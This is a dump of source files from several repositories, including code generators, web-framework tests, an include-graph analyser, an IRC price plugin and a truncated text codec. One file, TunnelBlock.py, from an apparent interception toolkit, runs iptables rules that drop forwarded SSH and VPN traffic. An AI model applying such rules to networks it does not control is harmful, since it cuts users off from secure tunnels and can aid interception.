repo_name (stringlengths 5–100) | ref (stringlengths 12–67) | path (stringlengths 4–244) | copies (stringlengths 1–8) | content (stringlengths 0–1.05M, ⌀) |
---|---|---|---|---|
incaser/odoo-odoo | refs/heads/8.0 | addons/l10n_de/__init__.py | 693 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
garymardell/libgraphqlparser | refs/heads/master | ast/cxx.py | 12 | # Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import cStringIO as StringIO
from casing import title
from license import C_LICENSE_COMMENT
class Printer(object):
def __init__(self):
self._type_name = None
# Map concrete type to base class
self._bases = {}
# HACK: Defer everything we print so that forward declarations for
# all classes come first. Avoids having to do 2 passes over the
# input file.
self._deferredOutput = StringIO.StringIO()
self._fields = []
def start_file(self):
print C_LICENSE_COMMENT + '''/** @generated */
#pragma once
#include "AstNode.h"
#include <memory>
#include <string>
#include <utility>
#include <vector>
namespace facebook {
namespace graphql {
namespace ast {
// The parser uses strdup to move from yytext to the heap, so we need
// to use free instead of delete.
struct CDeleter {
void operator()(const char *p) const { free((void *)p); }
};
'''
def end_file(self):
print
print self._deferredOutput.getvalue()
print '}'
print '}'
print '}'
def _base_class(self, type):
return self._bases.get(type, 'Node')
def start_type(self, name):
self._type_name = name
base = self._base_class(name)
# non-deferred!
print 'class %s;' % name
print >> self._deferredOutput, 'class %s : public %s {' % (name, base)
self._fields = []
def field(self, type, name, nullable, plural):
if type == 'OperationKind':
type = 'string'
self._fields.append((type, name, nullable, plural))
def end_type(self, name):
self._print_fields()
print >> self._deferredOutput, ' public:'
self._print_constructor()
print >> self._deferredOutput
self._print_destructor_prototype()
print >> self._deferredOutput
self._print_noncopyable()
print >> self._deferredOutput
self._print_getters()
print >> self._deferredOutput, ' void accept(visitor::AstVisitor *visitor) override;'
print >> self._deferredOutput, '};'
print >> self._deferredOutput
print >> self._deferredOutput
self._type_name = None
self._fields = []
def _storage_type(self, type):
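# Strings own their strdup'ed buffer through CDeleter (defined above); AST node
# types are held by a plain std::unique_ptr.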
if type == 'string':
return 'std::unique_ptr<const char, CDeleter>'
elif type == 'boolean':
return 'bool'
else:
return 'std::unique_ptr<%s>' % type
def _print_fields(self):
for (type, name, nullable, plural) in self._fields:
storage_type = self._storage_type(type)
if plural:
storage_type = 'std::unique_ptr<std::vector<%s>>' % storage_type
print >> self._deferredOutput, ' %s %s_;' % (storage_type, name)
def _ctor_singular_type(self, type):
if type == 'string':
return 'const char *'
elif type == 'boolean':
return 'bool'
else:
return '%s *' % type
def _ctor_plural_type(self, type):
return 'std::vector<%s> *' % self._storage_type(type)
def _print_constructor(self):
print >> self._deferredOutput, ' explicit %s(' % self._type_name
print >> self._deferredOutput, ' const yy::location &location%s' % (',' if self._fields else '')
def ctor_arg(type, name, plural):
if plural:
ctor_type = self._ctor_plural_type(type)
else:
ctor_type = self._ctor_singular_type(type)
return ' %s %s' % (ctor_type, name)
print >> self._deferredOutput, ',\n'.join(ctor_arg(type, name, plural)
for (type, name, nullable, plural) in self._fields)
print >> self._deferredOutput, ' )'
def ctor_init(type, name, plural):
# Strings are const char *, just pass.
# Vectors are passed by pointer and we take ownership.
# Node types are passed in by pointer and we take ownership.
value = name
return ' %s_(%s)' % (name, value)
print >> self._deferredOutput, ' : %s(location)%s' % (self._base_class(self._type_name), ',' if self._fields else '')
print >> self._deferredOutput, ',\n'.join(ctor_init(type, name, plural)
for (type, name, nullable, plural)
in self._fields)
print >> self._deferredOutput, ' {}'
def _getter_type(self, type, nullable, plural):
if plural and nullable:
return 'const std::vector<%s>*' % self._storage_type(type)
elif plural:
return 'const std::vector<%s>&' % self._storage_type(type)
if type == 'string':
assert not nullable
return 'const char *'
elif type == 'boolean':
assert not nullable
return 'bool'
elif nullable:
return 'const %s*' % type
else:
return 'const %s&' % type
def _getter_value_to_return(self, raw_value, type, nullable, plural):
if plural and nullable:
return raw_value + '.get()'
elif plural:
return '*%s' % raw_value
elif type == 'boolean':
return raw_value
elif nullable or type == 'string':
return '%s.get()' % raw_value
else:
return '*%s' % raw_value
def _print_getters(self):
for (type, name, nullable, plural) in self._fields:
print >> self._deferredOutput, ' %s get%s() const' % (
self._getter_type(type, nullable, plural),
title(name))
print >> self._deferredOutput, ' { return %s; }' % (
self._getter_value_to_return(name + '_', type, nullable, plural))
print >> self._deferredOutput
def _print_destructor_prototype(self):
print >> self._deferredOutput, ' ~%s() {}' % self._type_name
def _print_noncopyable(self):
print >> self._deferredOutput, ' %s(const %s&) = delete;' % (
self._type_name, self._type_name)
print >> self._deferredOutput, ' %s& operator=(const %s&) = delete;' % (
self._type_name, self._type_name)
def start_union(self, name):
self._type_name = name
# non-deferred!
print 'class %s;' % name
print >> self._deferredOutput, 'class %s : public Node {' % name
print >> self._deferredOutput, ' public:'
self._print_constructor()
print >> self._deferredOutput, '};'
print >> self._deferredOutput
def union_option(self, type):
assert type not in self._bases, '%s cannot appear in more than one union!' % type
self._bases[type] = self._type_name
def end_union(self, name):
pass
|
ahmed-mahran/hue | refs/heads/master | desktop/core/ext-py/Paste-2.0.1/tests/test_request.py | 47 | # (c) 2005 Ben Bangert
# This module is part of the Python Paste Project and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from paste.fixture import *
from paste.request import *
from paste.wsgiwrappers import WSGIRequest
import six
def simpleapp(environ, start_response):
status = '200 OK'
response_headers = [('Content-type','text/plain')]
start_response(status, response_headers)
request = WSGIRequest(environ)
body = [
'Hello world!\n', 'The get is %s' % str(request.GET),
' and Val is %s\n' % request.GET.get('name'),
'The languages are: %s\n' % request.languages,
'The accepttypes is: %s\n' % request.match_accept(['text/html', 'application/xml'])]
if six.PY3:
body = [line.encode('utf8') for line in body]
return body
def test_gets():
app = TestApp(simpleapp)
res = app.get('/')
assert 'Hello' in res
assert "get is MultiDict([])" in res
res = app.get('/?name=george')
res.mustcontain("get is MultiDict([('name', 'george')])")
res.mustcontain("Val is george")
def test_language_parsing():
app = TestApp(simpleapp)
res = app.get('/')
assert "The languages are: ['en-us']" in res
res = app.get('/', headers={'Accept-Language':'da, en-gb;q=0.8, en;q=0.7'})
assert "languages are: ['da', 'en-gb', 'en', 'en-us']" in res
res = app.get('/', headers={'Accept-Language':'en-gb;q=0.8, da, en;q=0.7'})
assert "languages are: ['da', 'en-gb', 'en', 'en-us']" in res
def test_mime_parsing():
app = TestApp(simpleapp)
res = app.get('/', headers={'Accept':'text/html'})
assert "accepttypes is: ['text/html']" in res
res = app.get('/', headers={'Accept':'application/xml'})
assert "accepttypes is: ['application/xml']" in res
res = app.get('/', headers={'Accept':'application/xml,*/*'})
assert "accepttypes is: ['text/html', 'application/xml']" in res
def test_bad_cookie():
env = {}
env['HTTP_COOKIE'] = '070-it-:><?0'
assert get_cookie_dict(env) == {}
env['HTTP_COOKIE'] = 'foo=bar'
assert get_cookie_dict(env) == {'foo': 'bar'}
env['HTTP_COOKIE'] = '...'
assert get_cookie_dict(env) == {}
env['HTTP_COOKIE'] = '=foo'
assert get_cookie_dict(env) == {}
env['HTTP_COOKIE'] = '?='
assert get_cookie_dict(env) == {}
|
diego1996/subterfuge | refs/heads/master | modules/TunnelBlock/TunnelBlock.py | 25 | #!/usr/bin/python
import os
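# Requires root: each rule below drops forwarded traffic on a port commonly
# used by the named tunnel type.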
#SSH Tunnels
os.system("iptables -A FORWARD -p tcp --destination-port 22 -j DROP")
#PPTP Tunnels
os.system("iptables -A FORWARD -p tcp --destination-port 1723 -j DROP")
#L2TP Tunnels
os.system("iptables -A FORWARD -p udp --destination-port 500 -j DROP")
os.system("iptables -A FORWARD -p udp --destination-port 4500 -j DROP")
#Cisco IPSec Tunnels
os.system("iptables -A FORWARD -p udp --destination-port 10000 -j DROP")
#OpenVPN Tunnels
os.system("iptables -A FORWARD -p udp --destination-port 1194 -j DROP")
|
waseem18/oh-mainline | refs/heads/master | vendor/packages/Django/django/contrib/gis/utils/geoip.py | 114 | import warnings
from django.contrib.gis import geoip
HAS_GEOIP = geoip.HAS_GEOIP
if HAS_GEOIP:
BaseGeoIP = geoip.GeoIP
GeoIPException = geoip.GeoIPException
class GeoIP(BaseGeoIP):
def __init__(self, *args, **kwargs):
warnings.warn('GeoIP class has been moved to `django.contrib.gis.geoip`, and '
'this shortcut will disappear in Django v1.6.',
DeprecationWarning, stacklevel=2)
super(GeoIP, self).__init__(*args, **kwargs)
|
Victor-Haefner/polyvr | refs/heads/master | extras/analytics/computeIncludeGraph.py | 1 | #!/usr/bin/python
import os, fnmatch, subprocess
import numpy, Gnuplot # sudo apt install python-gnuplot
import datetime
from PIL import Image
from time import sleep
sourceDir = '../../src'
#sourceDir = 'testData'
resolution = '8000, 8000'
def add(L, F, R):
if not F in L: L[F] = R+'/'+F
else: print 'Warning!', F, 'already present (', L[F], ',', R+'/'+F, ')'
def getIncludes(path):
includes = []
for line in open(path):
if '#include' in line: includes.append(line)
return includes
def getFile(include, includeGraph):
for File in includeGraph:
if File in include: return File
#return include
def openImg(path):
img = Image.open(path)
img.show()
class Plot:
def __init__(self):
print 'init graph'
self.g = Gnuplot.Gnuplot()
self.g.title("PolyVR Code Analytics, Include Graph")
self.g("set grid")
self.g("set xtic 1")
self.g("set ytic 1")
#self.g('set terminal x11 size 2000, 1000')
self.g('set terminal png size '+resolution)
#self.g('set size 2,2')
self.edges = []
self.nodes = []
print ' done'
def draw(self):
print 'draw'
vectorsX0 = []
vectorsY0 = []
vectorsX = []
vectorsY = []
points = []
for e in self.edges:
vectorsX0.append(e[1][0])
vectorsY0.append(e[1][1])
vectorsX.append(e[0][0]-e[1][0])
vectorsY.append(e[0][1]-e[1][1])
for n in self.nodes:
points.append([n[0], n[1]])
self.g('set label "'+n[2]+'" at '+str(n[0]-0.1)+','+str(n[1])+' font "Sans,10"')
d1 = Gnuplot.Data(vectorsX0, vectorsY0, vectorsX, vectorsY, title="", with_="vectors")
d2 = Gnuplot.Data(points, title="", with_="points")
self.g.plot(d1, d2)
self.g.hardcopy (filename='/tmp/polyvr.png', terminal='png') # write last plot to another terminal
sleep(7)
openImg('/tmp/polyvr.png')
input("Press Enter to continue...")
print ' done'
def addEdge(self, p0,p1):
self.edges.append([p0,p1])
def addNode(self, pos, name):
self.nodes.append(pos+[name])
class Analytics:
def __init__(self):
self.headers = {}
self.sources = {}
self.positions = {}
self.dependsGraph = {} # key is file name, value is list of files included
self.includeGraph = {} # key is file name, value is list of files that include it
self.layers = [[]]
def traverseSources(self, sourceDir):
for root, Dir, files in os.walk(sourceDir):
for item in fnmatch.filter(files, "*.h"): add(self.headers, item, root)
for item in fnmatch.filter(files, "*.cpp"): add(self.sources, item, root)
print 'N headers:', len(self.headers)
print 'N sources:', len(self.sources)
# fill depends graph
for name, path in self.headers.items(): self.dependsGraph[name] = getIncludes(path)
for name, path in self.sources.items(): self.dependsGraph[name] = getIncludes(path)
for name, path in self.headers.items(): self.includeGraph[name] = []
for name, includes in self.dependsGraph.items():
newIncludes = []
for include in includes:
f = getFile(include, self.headers)
if f: newIncludes.append(f)
self.dependsGraph[name] = newIncludes
# fill include graph
for name, includes in self.dependsGraph.items():
for include in includes:
if include in self.includeGraph:
if not name in self.includeGraph[include]: self.includeGraph[include].append(name)
def computeLayers(self):
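# Builds layers bottom-up: layer 0 holds headers that include nothing but are
# themselves included; each later layer holds the files that include the
# previous layer (capped at 20 layers as a cycle guard).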
processedFiles = {}
def getNewLayer(layer, layers):
ref = layer[:]
newLayer = []
for f in layer:
if not f in self.includeGraph: continue
for includer in self.includeGraph[f]:
if includer in processedFiles: processedFiles[includer].remove(includer)
newLayer.append(includer)
processedFiles[includer] = newLayer
if ref == newLayer:
del layers[-1]
layers.append(newLayer)
return []
return newLayer
def addNextLayer(layer, layers):
if len(layers) > 20: return # safety check
newLayer = getNewLayer(layer, layers)
if len(newLayer) > 0:
layers.append(newLayer)
addNextLayer(newLayer, layers)
for header in self.headers:
if len(self.dependsGraph[header]) == 0 and len(self.includeGraph[header]) > 0:
self.layers[0].append(header)
addNextLayer(self.layers[0], self.layers)
def computePositions(self):
for j,layer in enumerate(self.layers):
for i,f in enumerate(layer):
if not f in self.positions: self.positions[f] = [j+0.1, -i-0.1]
def drawGraph():
P = Plot()
for label, pos in A.positions.items(): P.addNode(pos, label)
for name, includes in A.dependsGraph.items():
for include in includes:
if name in A.positions and include in A.positions:
P.addEdge(A.positions[name], A.positions[include])
P.draw()
compilationTimes = {}
totalTime = 0
def getCompilationTimes():
def runCompilation(h):
with open("testMain.cpp") as f: lines = f.readlines()
lines[0] = '#include "'+A.headers[h]+'"\n'
with open("testMain.cpp", "w") as f: f.writelines(lines)
cmd = "codeblocks -ni -ns --multiple-instance --target='Release' --rebuild PolyVR_18.04.cbp > /dev/null"
ta = datetime.datetime.now()
os.system(cmd)
tb = datetime.datetime.now()
return (tb - ta).total_seconds()
i = 0
tA = datetime.datetime.now()
for header in A.headers:
print 'compile header:', header,
compilationTimes[header] = runCompilation(header)
print compilationTimes[header]
i += 1
#if i == 5: break
tB = datetime.datetime.now()
return (tB - tA).total_seconds()
def countImpact(): # compute how many source files the header impacts
def countIncludes(header, processed):
processed.append(header)
if header in A.includeGraph:
for f in A.includeGraph[header]:
if not f in processed: countIncludes(f, processed)
import random, operator
Ndepends = {}
for header in A.headers:
processed = []
countIncludes(header, processed)
Nc = 0
Nh = 0
for p in processed:
if p[-4:] == '.cpp': Nc+=1
if p[-2:] == '.h': Nh+=1
Ndepends[header] = (Nh, processed, Nc)
Ndepends = sorted(Ndepends.items(), key=operator.itemgetter(1,0))
for h in Ndepends:
#print len(h[1][1]), h
print h[0], ' '*(40-len(h[0])), len(A.includeGraph[h[0]]), '\t,', h[1][2], '\t/', len(A.sources), '\t,', h[1][0], '\t/', len(A.headers), '\t- ',
if h[0] in compilationTimes: print compilationTimes[h[0]], ' s'
else: print ' '
print 'total compilation time:', totalTime
A = Analytics()
A.traverseSources(sourceDir)
A.computeLayers()
A.computePositions()
totalTime = getCompilationTimes()
countImpact()
#drawGraph()
|
ihatevim/aetherbot | refs/heads/master | plugins/cryptocurrency.py | 3 | """
cryptocurrency.py
A plugin that uses the CoinMarketCap JSON API to get values for cryptocurrencies.
Created By:
- Luke Rogers <https://github.com/lukeroge>
Special Thanks:
- https://coinmarketcap-nexuist.rhcloud.com/
License:
GPL v3
"""
from urllib.parse import quote_plus
from datetime import datetime
import requests
from cloudbot import hook
API_URL = "https://coinmarketcap-nexuist.rhcloud.com/api/{}"
# aliases
@hook.command("bitcoin", "btc", autohelp=False)
def bitcoin():
""" -- Returns current bitcoin value """
# alias
return crypto_command("btc")
@hook.command("litecoin", "ltc", autohelp=False)
def litecoin():
""" -- Returns current litecoin value """
# alias
return crypto_command("ltc")
@hook.command("dogecoin", "doge", autohelp=False)
def dogecoin():
""" -- Returns current dogecoin value """
# alias
return crypto_command("doge")
# main command
@hook.command("crypto", "cryptocurrency")
def crypto_command(text):
""" <ticker> -- Returns current value of a cryptocurrency """
try:
encoded = quote_plus(text)
request = requests.get(API_URL.format(encoded))
request.raise_for_status()
except (requests.exceptions.HTTPError, requests.exceptions.ConnectionError) as e:
return "Could not get value: {}".format(e)
data = request.json()
if "error" in data:
return "{}.".format(data['error'])
updated_time = datetime.fromtimestamp(float(data['timestamp']))
if (datetime.today() - updated_time).days > 2:
# the API retains data for old ticker names that are no longer updated
# in these cases we just return a "not found" message
return "Currency not found."
change = float(data['change'])
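# \x03N starts an mIRC colour code (3 is green for gains, 5 a maroon/dark red
# for losses) and \x0f resets formatting.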
if change > 0:
change_str = "\x033 {}%\x0f".format(change)
elif change < 0:
change_str = "\x035 {}%\x0f".format(change)
else:
change_str = "{}%".format(change)
return "{} // \x0307${:,.2f}\x0f USD - {:,.7f} BTC // {} change".format(data['symbol'].upper(),
float(data['price']['usd']),
float(data['price']['btc']),
change_str)
|
basicthinker/Sexain-MemController | refs/heads/master | gem5-stable/src/arch/x86/isa/insts/general_purpose/__init__.py | 91 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
categories = ["arithmetic",
"cache_and_memory_management",
"compare_and_test",
"control_transfer",
"data_conversion",
"data_transfer",
"flags",
"input_output",
"load_effective_address",
"load_segment_registers",
"logical",
"no_operation",
"rotate_and_shift",
"semaphores",
"string",
"system_calls"]
microcode = '''
# Microcode for general purpose instructions
'''
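# Python 2 exec statement: import each category submodule and append its
# microcode to the combined string.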
for category in categories:
exec "import %s as cat" % category
microcode += cat.microcode
|
farin/django-enroll | refs/heads/master | enroll/backends.py | 1 | from django.contrib.auth.backends import ModelBackend as DjangoModelBackend
from django.contrib.auth import get_user_model
from django.db.models.query_utils import Q
from django.conf import settings
class ModelBackend(DjangoModelBackend):
"""Extended authentication backend"""
supports_inactive_user = getattr(settings, 'ENROLL_AUTH_BACKEND_INACTIVE_USER', True )
# should contain only unique columns!
login_attributes = getattr(settings, 'ENROLL_AUTH_BACKEND_LOGIN_ATTRIBUTES', ['username'] )
def find_user_by_login(self, login):
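# OR together one Q(<attr>=login) lookup per configured login attribute so a
# single query can match username, e-mail address, etc.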
combined = None
for login_attr in self.login_attributes:
q = Q(**{login_attr: login})
combined = q if combined is None else combined | q
return get_user_model().objects.get(combined)
def authenticate_user(self, user, password, request=None):
return user if user.check_password(password) else None
def authenticate(self, username=None, password=None, request=None):
try:
user = self.find_user_by_login(username)
return self.authenticate_user(user, password, request)
except get_user_model().DoesNotExist:
return None
#class SignUpBackend(object):
|
gklyne/annalist | refs/heads/master | src/annalist_root/annalist/tests/test_entityeditdupfield.py | 1 | from __future__ import unicode_literals
from __future__ import absolute_import, division, print_function
"""
Entity editing tests for duplicated fields
"""
__author__ = "Graham Klyne ([email protected])"
__copyright__ = "Copyright 2014, G. Klyne"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import os
import unittest
import logging
log = logging.getLogger(__name__)
from django.conf import settings
from django.db import models
from django.http import QueryDict
from django.contrib.auth.models import User
from django.test import TestCase # cf. https://docs.djangoproject.com/en/dev/topics/testing/tools/#assertions
from django.test.client import Client
from utils.SuppressLoggingContext import SuppressLogging
from annalist.identifiers import RDF, RDFS, ANNAL
from annalist import layout
from annalist.models.entitytypeinfo import EntityTypeInfo
from annalist.models.site import Site
from annalist.models.collection import Collection
from annalist.models.recordtype import RecordType
from annalist.models.recordlist import RecordList
from annalist.models.recordview import RecordView
from annalist.models.recordfield import RecordField
from annalist.models.recordtypedata import RecordTypeData
from annalist.models.entitydata import EntityData
from annalist.views.form_utils.fieldchoice import FieldChoice
from .AnnalistTestCase import AnnalistTestCase
from .tests import (
test_layout,
TestHost, TestHostUri, TestBasePath, TestBaseUri, TestBaseDir
)
from .init_tests import (
init_annalist_test_site, init_annalist_test_coll, resetSitedata
)
from .entity_testfielddesc import get_field_description, get_bound_field
from .entity_testutils import (
collection_create_values,
continuation_url_param,
create_test_user,
context_view_field,
context_bind_fields,
context_field_row
)
from .entity_testtypedata import (
recordtype_url,
recordtype_edit_url,
recordtype_create_values,
)
from .entity_testviewdata import (
recordview_url,
recordview_create_values, recordview_values, recordview_values_add_field,
)
from .entity_testentitydata import (
entity_url, entitydata_edit_url,
entitydata_value_keys,
entitydata_create_values, entitydata_values, entitydata_values_add_field,
default_view_form_data, entitydata_form_add_field,
default_view_context_data,
default_comment
)
from .entity_testsitedata import (
get_site_types, get_site_types_sorted, get_site_types_linked,
get_site_lists, get_site_lists_sorted,
get_site_list_types, get_site_list_types_sorted,
get_site_views, get_site_views_sorted,
get_site_field_groups, get_site_field_groups_sorted,
get_site_fields, get_site_fields_sorted,
get_site_field_types, get_site_field_types_sorted,
)
# -----------------------------------------------------------------------------
#
# Helper function to build test context value
#
# -----------------------------------------------------------------------------
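# Duplicated view fields are disambiguated with __2/__3 suffixes on the form
# field name; the third comment field is bound to the alternate property URI
# rdfs:comment_alt.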
def dupfield_view_context_data(
entity_id=None, orig_id=None,
coll_id="testcoll", type_id="testtype",
type_ref=None, type_choices=None, type_ids=[],
entity_label=None,
entity_descr=None,
entity_descr2=None,
entity_descr3=None,
record_type="annal:EntityData",
action=None, update="Entity", view_label="RecordView testcoll/DupField_view",
continuation_url=None
):
context_dict = default_view_context_data(
entity_id=entity_id, orig_id=orig_id,
coll_id=coll_id, type_id=type_id,
type_ref=type_ref, type_choices=type_choices, type_ids=type_ids,
entity_label=entity_label, entity_descr=entity_descr,
record_type=record_type,
action=action, update=update, view_label=view_label,
continuation_url=continuation_url
)
context_dict['fields'].append(
context_field_row(
get_bound_field("Entity_comment", entity_descr2,
name="Entity_comment__2",
prop_uri="rdfs:comment__2"
)
)
)
context_dict['fields'].append(
context_field_row(
get_bound_field("Entity_comment", entity_descr3,
name="Entity_comment__3",
prop_uri="rdfs:comment_alt"
)
)
)
return context_dict
# -----------------------------------------------------------------------------
#
# Entity edit duplicated field tests
#
# -----------------------------------------------------------------------------
class EntityEditDupFieldTest(AnnalistTestCase):
def setUp(self):
init_annalist_test_site()
self.testsite = Site(TestBaseUri, TestBaseDir)
self.testcoll = Collection.create(self.testsite, "testcoll",
collection_create_values("testcoll")
)
self.testtype = RecordType.create(self.testcoll, "testtype",
recordtype_create_values("testcoll", "testtype")
)
self.testdata = RecordTypeData.create(self.testcoll, "testtype", {})
# Create view with repeated field id
self.viewdata = recordview_create_values(view_id="DupField_view")
recordview_values_add_field(
self.viewdata,
field_id="Entity_comment",
field_placement="small:0,12"
)
recordview_values_add_field(
self.viewdata,
field_id="Entity_comment",
field_property_uri="rdfs:comment_alt",
field_placement="small:0,12"
)
self.testview = RecordView.create(self.testcoll, "DupField_view", self.viewdata)
# Other data
self.type_ids = get_site_types_linked("testcoll")
self.type_ids.append(FieldChoice("_type/testtype",
label="RecordType testcoll/_type/testtype",
link=recordtype_url("testcoll", "testtype")
))
# Login and permissions
create_test_user(self.testcoll, "testuser", "testpassword")
self.client = Client(HTTP_HOST=TestHost)
loggedin = self.client.login(username="testuser", password="testpassword")
self.assertTrue(loggedin)
return
def tearDown(self):
# resetSitedata(scope="collections")
return
@classmethod
def tearDownClass(cls):
super(EntityEditDupFieldTest, cls).tearDownClass()
resetSitedata(scope="collections") #@@checkme@@
return
# -----------------------------------------------------------------------------
# Helpers
# -----------------------------------------------------------------------------
def _check_record_view_values(self, view_id, view_values):
"Helper function checks content of record view entry with supplied view_id"
self.assertTrue(RecordView.exists(self.testcoll, view_id))
t = RecordView.load(self.testcoll, view_id)
self.assertEqual(t.get_id(), view_id)
self.assertDictionaryMatch(t.get_values(), view_values)
return t
def _create_entity_data(self,
entity_id, type_id="testtype", update="Entity",
comment2="Comment field 2",
comment3="Comment field 3"
):
"Helper function creates entity data with supplied entity_id"
v = entitydata_create_values(entity_id, type_id=type_id, update=update)
v = entitydata_values_add_field(v, "rdfs:comment", 2, comment2)
v = entitydata_values_add_field(v, "rdfs:comment_alt", 3, comment3)
e = EntityData.create(self.testdata, entity_id, v)
return e
def _check_entity_data_values(self,
entity_id, type_id="testtype", update="Entity",
comment2="Comment field 2",
comment3="Comment field 3"
):
"Helper function checks content of form-updated record type entry with supplied entity_id"
# log.info("_check_entity_data_values: type_id %s, entity_id %s"%(type_id, entity_id))
typeinfo = EntityTypeInfo(self.testcoll, type_id)
self.assertTrue(typeinfo.entityclass.exists(typeinfo.entityparent, entity_id))
e = typeinfo.entityclass.load(typeinfo.entityparent, entity_id)
self.assertEqual(e.get_id(), entity_id)
v = entitydata_values(entity_id, type_id=type_id, update=update)
v = entitydata_values_add_field(v, "rdfs:comment", 2, comment2)
v = entitydata_values_add_field(v, "rdfs:comment_alt", 3, comment3)
self.assertDictionaryMatch(e.get_values(), v)
return e
# -----------------------------------------------------------------------------
# Form response tests
# -----------------------------------------------------------------------------
def test_view_dup_field_values(self):
self._check_record_view_values("DupField_view", self.viewdata)
return
def test_dup_field_display(self):
# Create entity with duplicate fields
self._create_entity_data("entitydupfield")
self._check_entity_data_values(
"entitydupfield", type_id="testtype", update="Entity",
comment2="Comment field 2",
comment3="Comment field 3"
)
# Display entity in view with duplicate fields
u = entitydata_edit_url(
"edit", "testcoll", "testtype",
entity_id="entitydupfield",
view_id="DupField_view"
)
r = self.client.get(u)
self.assertEqual(r.status_code, 200)
self.assertEqual(r.reason_phrase, "OK")
# Check display context
expect_context = dupfield_view_context_data(
coll_id="testcoll", type_id="testtype",
entity_id="entitydupfield", orig_id=None,
type_ref="testtype", type_choices=self.type_ids,
entity_label="Entity testcoll/testtype/entitydupfield",
entity_descr="Entity coll testcoll, type testtype, entity entitydupfield",
entity_descr2="Comment field 2",
entity_descr3="Comment field 3",
record_type="/testsite/c/testcoll/d/_type/testtype/",
action="edit",
update="Entity",
continuation_url=""
)
self.assertEqual(len(r.context['fields']), 5)
self.assertDictionaryMatch(context_bind_fields(r.context), expect_context)
def test_dup_field_update(self):
# Create entity with duplicate fields
self._create_entity_data("entitydupfield")
self._check_entity_data_values(
"entitydupfield", type_id="testtype", update="Entity",
comment2="Comment field 2",
comment3="Comment field 3"
)
# Post form data to update entity
u = entitydata_edit_url(
"edit", "testcoll", "testtype",
entity_id="entitydupfield",
view_id="DupField_view"
)
f = default_view_form_data(
entity_id="entitydupfield",
type_id="testtype",
coll_id="testcoll",
action="edit", update="Updated Entity"
)
f = entitydata_form_add_field(f, "Entity_comment", 2, "Update comment 2")
f = entitydata_form_add_field(f, "Entity_comment", 3, "Update comment 3")
r = self.client.post(u, f)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.reason_phrase, "Found")
# Test resulting entity value
self._check_entity_data_values(
"entitydupfield", type_id="testtype", update="Updated Entity",
comment2="Update comment 2",
comment3="Update comment 3"
)
return
# End.
|
steventimberman/masterDebater | refs/heads/master | venv/lib/python2.7/site-packages/django/contrib/sitemaps/management/__init__.py | 12133432 | |
fafaman/django | refs/heads/master | tests/migrations/migrations_test_apps/with_package_model/models/__init__.py | 12133432 | |
vipins/ccccms | refs/heads/master | env/Lib/encodings/utf_32.py | 375 | """
Python 'utf-32' Codec
"""
import codecs, sys
### Codec APIs
encode = codecs.utf_32_encode
def decode(input, errors='strict'):
return codecs.utf_32_decode(input, errors, True)
class IncrementalEncoder(codecs.IncrementalEncoder):
def __init__(self, errors='strict'):
codecs.IncrementalEncoder.__init__(self, errors)
self.encoder = None
def encode(self, input, final=False):
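# On the first call, codecs.utf_32_encode emits the BOM; we then latch the
# native-endian encoder so later chunks skip the BOM.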
if self.encoder is None:
result = codecs.utf_32_encode(input, self.errors)[0]
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
return result
return self.encoder(input, self.errors)[0]
def reset(self):
codecs.IncrementalEncoder.reset(self)
self.encoder = None
def getstate(self):
# state info we return to the caller:
# 0: stream is in natural order for this platform
# 2: endianness hasn't been determined yet
# (we're never writing in unnatural order)
return (2 if self.encoder is None else 0)
def setstate(self, state):
if state:
self.encoder = None
else:
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
class IncrementalDecoder(codecs.BufferedIncrementalDecoder):
def __init__(self, errors='strict'):
codecs.BufferedIncrementalDecoder.__init__(self, errors)
self.decoder = None
